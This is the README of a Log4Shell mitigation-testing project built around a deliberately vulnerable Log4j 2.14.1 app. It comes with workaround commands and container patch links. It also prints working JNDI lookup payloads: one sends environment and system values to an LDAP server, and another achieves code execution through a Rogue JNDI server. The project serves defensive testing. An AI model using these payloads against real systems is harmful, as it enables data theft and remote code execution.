Log4Shell CVE-2021-44228 mitigation tester# Log4Shell Mitigation tester
This is an example application using Log4j 2.14.1 .
source code: [App.java](app/src/main/java/log4shell/mitigation/tester/App.java)
The purpose of this is to be able to test different mitigation approaches. The mitigation approaches are also mentioned in [Microsoft’s Response to CVE-2021-44228 Apache Log4j 2](https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/).
## Example usage
Examples are for a bash shell
build the app
```
./gradlew assemble
```
Run without workaround
```
java -jar app/build/libs/app-all.jar
```
Test some message lookup feature by passing a string on command line:
```
FOO='Hello ${env:USER}' java -jar app/build/libs/app-all.jar '${env:FOO}'
```
Test `-Dlog4j2.formatMsgNoLookups=true` system property workaround, https://twitter.com/brunoborges/status/1469186875608875011
```
java -Dlog4j2.formatMsgNoLookups=true -jar app/build/libs/app-all.jar
```
Test ``LOG4J_FORMAT_MSG_NO_LOOKUPS=true`` environment variable workaround, https://twitter.com/brunoborges/status/1469462412679991300
```
LOG4J_FORMAT_MSG_NO_LOOKUPS=true java -jar app/build/libs/app-all.jar
```
Test `JAVA_TOOL_OPTIONS=-Dlog4j.formatMsgNoLookups=true` environment variable workaround, https://twitter.com/brunoborges/status/1469426918550245377
```
JAVA_TOOL_OPTIONS=-Dlog4j.formatMsgNoLookups=true java -jar app/build/libs/app-all.jar
```
Test log4j2.component.properties in classpath workaround solution:
```
java -cp log4j2-formatMsgNoLookups/build/libs/log4j2-formatMsgNoLookups.jar:app/build/libs/app-all.jar log4shell.mitigation.tester.App
```
## Seeing is believing - exploit this sample app
When you run the app, you will see the vulnerability in action:
```bash
❯ java -jar app/build/libs/app-all.jar '${jndi:ldap://127.0.0.1/a?user=${env:USER}}'
[2021-12-12 10:57:07,216] [main] [log4shell.mitigation.tester.App] INFO noLookups false
[2021-12-12 10:57:07,218] [main] [log4shell.mitigation.tester.App] INFO Lookups are enabled! The application is vulnerable for Log4Shell! Example lookup USER=lari
2021-12-12 10:57:07,239 main WARN Error looking up JNDI resource [ldap://127.0.0.1/a?user=lari]. javax.naming.InvalidNameException: ldap://127.0.0.1/a?user=lari
at java.naming/com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:92)
at java.naming/javax.naming.InitialContext.lookup(InitialContext.java:409)
```
You can also debug the solution and place a break point in the vulnerable code which is
https://github.com/apache/logging-log4j2/blob/dd18e9b21009055e226daf5b233c92b6a17934ca/log4j-core/src/main/java/org/apache/logging/log4j/core/pattern/MessagePatternConverter.java#L119-L135
Set the debugger in class is `org.apache.logging.log4j.core.pattern.MessagePatternConverter` at line 128.
When the mitigation is in place, the debugger should never get in the code block. The LDAP call shouldn't get attempted either:
```bash
❯ LOG4J_FORMAT_MSG_NO_LOOKUPS=true java -jar app/build/libs/app-all.jar '${jndi:ldap://127.0.0.1/a?user=${env:USER}}'
[2021-12-12 10:59:15,589] [main] [log4shell.mitigation.tester.App] INFO noLookups true
[2021-12-12 10:59:15,590] [main] [log4shell.mitigation.tester.App] INFO Lookups are disabled. Example lookup USER=${env:USER}
[2021-12-12 10:59:15,591] [main] [log4shell.mitigation.tester.App] INFO Provided command line arguments are [${jndi:ldap://127.0.0.1/a?user=${env:USER}}]
```
### Exploiting with Rogue JNDI
Demonstrating information leakage depends on https://github.com/veracode-research/rogue-jndi/pull/11 changes
in one terminal
```
git clone https://github.com/veracode-research/rogue-jndi
cd rogue-jndi
# build with PR https://github.com/veracode-research/rogue-jndi/pull/11 changes
git fetch origin pull/11/head
git checkout FETCH_HEAD
mvn package
# sample command is for Linux, remove `-c "zenity --progress --pulsate --text=You_are_hacked"` on other OSes or use any suitable RCE command
java -jar target/RogueJndi-1.1.jar -c "zenity --progress --pulsate --text=You_are_hacked"
```
in another terminal:
```
# demonstrate information leakage
java -jar app/build/libs/app-all.jar '${jndi:ldap://127.0.1.1:1389/user=${env:USER},vendor=${sys:java.vendor},javaversion=${sys:java.vm.version},os=${sys:os.version}}'
# demonstrate RCE by adding "-Dcom.sun.jndi.ldap.object.trustURLCodebase=true"
java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar app/build/libs/app-all.jar '${jndi:ldap://127.0.1.1:1389/o=reference}'
```
## Kubernetes / docker mitigation solutions for Log4Shell
It is necessary to mitigate Log4Shell immediately without waiting for a new software release. Here are some solutions for doing that quickly and effectively.
### Patching existing docker images with a thin overlay that sets LOG4J_FORMAT_MSG_NO_LOOKUPS=true env
This is a generic solution:
https://github.com/lhotari/Log4Shell-mitigation-Dockerfile-overlay
### Example of patching existing docker images with Log4j 2.15.0 jar files
This is not generic, example is from apache/pulsar:
https://github.com/lhotari/pulsar-docker-images-patch-CVE-2021-44228
### Patching k8s deployments with LOG4J_FORMAT_MSG_NO_LOOKUPS=true env
https://gist.github.com/brunoborges/9df576689b404aee70a8065210c77fb3
[4.0K] /data/pocs/a0603c57b5d54427a34965a0955ccf54ba5dde62
├── [4.0K] app
│ ├── [1.2K] build.gradle
│ └── [4.0K] src
│ ├── [4.0K] main
│ │ ├── [4.0K] java
│ │ │ └── [4.0K] log4shell
│ │ │ └── [4.0K] mitigation
│ │ │ └── [4.0K] tester
│ │ │ └── [1.0K] App.java
│ │ └── [4.0K] resources
│ │ └── [ 330] log4j2.xml
│ └── [4.0K] test
│ └── [4.0K] java
│ └── [4.0K] log4shell
│ └── [4.0K] mitigation
│ └── [4.0K] tester
│ └── [ 379] AppTest.java
├── [4.0K] gradle
│ └── [4.0K] wrapper
│ ├── [ 58K] gradle-wrapper.jar
│ └── [ 202] gradle-wrapper.properties
├── [7.9K] gradlew
├── [2.7K] gradlew.bat
├── [4.0K] log4j2-formatMsgNoLookups
│ ├── [ 26] build.gradle
│ └── [4.0K] src
│ └── [4.0K] main
│ └── [4.0K] resources
│ └── [ 31] log4j2.component.properties
├── [5.1K] README.md
└── [ 427] settings.gradle
19 directories, 12 files